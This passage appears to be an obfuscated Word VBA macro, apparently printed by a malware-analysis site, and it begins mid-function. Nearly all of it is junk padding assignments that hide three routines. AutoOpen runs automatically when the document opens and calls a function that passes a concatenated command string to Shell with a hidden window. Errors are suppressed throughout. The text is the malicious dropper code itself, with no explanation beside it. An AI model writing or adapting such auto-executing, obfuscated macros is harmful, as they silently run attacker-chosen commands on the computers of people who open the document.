RfSHjR = 19942
zBqoHQ = CDate(75309)
BBCzSj = ImOjJm
wkQawu = 37607
qjMBDY = CByte(REjwdc)
Sojzbr = CDate(HzDkAT + Sin(3720 + 76270) * 12147 * CInt(74700))
EONXV = 7926
SEOYp = CDate(32059)
IYnSnv = VCfiZ
mozkvt = 53682
vOkBO = CByte(laSVz)
vFoPli = CDate(ONFPXn + Sin(42221 + 74630) * 83548 * CInt(1036))
uiMjQ = 13726
jPjoj = CDate(39662)
zNmSD = NkjmEU
zSTAYU = 6032
LffMOZ = CByte(stcRtN)
bpWkCz = CDate(EnuTrD + Sin(19550 + 42650) * 99490 * CInt(42058))
niFkqI = 54843
SPCAT = CDate(21355)
JGGbzb = kGtKp
ZsnFh = 97251
KFKPK = CByte(hGHImY)
JwZfqt = CDate(ZVwNVz + Sin(24491 + 49985) * 59354 * CInt(53929))
mWSrLf = 58546
End Function
Function wDwXICEjtS()
On Error Resume Next
cGnFPf = CDate(20745)
ZPbcS = JKhCSd
QiHlJ = 91484
YJska = CByte(JEZhA)
wjUOzz = CDate(scwpo + Sin(61842 + 75103) * 22876 * CInt(93445))
sFwUS = 84553
DaRzdQCJJhl = MwPhP + Chr(mnsSj + 80 + IiZXAaXF)
SvwPD = CDate(11805)
UCpOWl = dZShB
dlczQc = 51489
MRouqE = CByte(QjwjmK)
qLUTHX = CDate(mdLpSR + Sin(96692 + 29279) * 25824 * CInt(47161))
ZUIVG = 38677
iwVEc = CDate(20189)
AdZqQ = tRkLE
ijBiGm = 82795
sFDhX = CByte(iDucoj)
wJcIt = CDate(EnALIk + Sin(89550 + 71127) * 70923 * CInt(37574))
jadbaV = 67484
wDwXICEjtS = zJMfwjnfc + DaRzdQCJJhl + kUIjAdLmpA + jSzbDhZE + worEFlZJ + RabEFGbjEsA + JwjCHNVl
jqImzF = CDate(38504)
LEaViq = omtDf
uoZXvD = 68060
Eodti = CByte(Ezlah)
fITPBq = CDate(LDBuN + Sin(58264 + 49653) * 25487 * CInt(92634))
Xqjwow = 40120
End Function
Function FBsrdCR(KQWRPC)
On Error Resume Next
OwRfQd = CDate(9229)
hjppi = iBncrT
roksv = 68515
URJdMF = CByte(BtPART)
flRbSU = CDate(pciGV + Sin(38413 + 40529) * 70211 * CInt(50157))
iFaql = 46481
mZfrXW = CDate(29966)
ijcBvL = CoaZL
kmUlD = 74172
KzHtL = CByte(LjuPow)
BvdjM = CDate(ivPDm + Sin(93058 + 40869) * 37236 * CInt(7623))
cNhWO = 18879
CRZwI = CiYQnwV + Shell(NNoKitKjJ + KQWRPC + sjBXorS, 80292 - 80292)
buloXo = CDate(73894)
pHUVm = FUSBQ
dKzdd = 75643
MBAcTV = CByte(IruOIp)
FZHJBC = CDate(jwYIj + Sin(97039 + 1034) * 77580 * CInt(96110))
pFwsV = 93370
End Function
Sub AutoOpen()
On Error Resume Next
pjBHS = CDate(17027)
KZHYRa = iKTUl
VKUwkL = 92226
AImbFn = CByte(hhSUSQ)
JocDN = CDate(vVLjKq + Sin(36190 + 9533) * 22593 * CInt(61558))
csnXqU = 18471
Application.Run pzPvkRNAN + "FBsrdCR" + ZYYzisfE, OftsVIF + wDwXICEjtS + bOfph
ZCIbkQ = CDate(12485)
rhUfz = dwGizq
sLmMV = 67323
bzwdD = CByte(ztBusN)
DvOrW = CDate(ROVLv + Sin(83026 + 83328) * 5509 * CInt(24581))
LcFcs = 45445
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.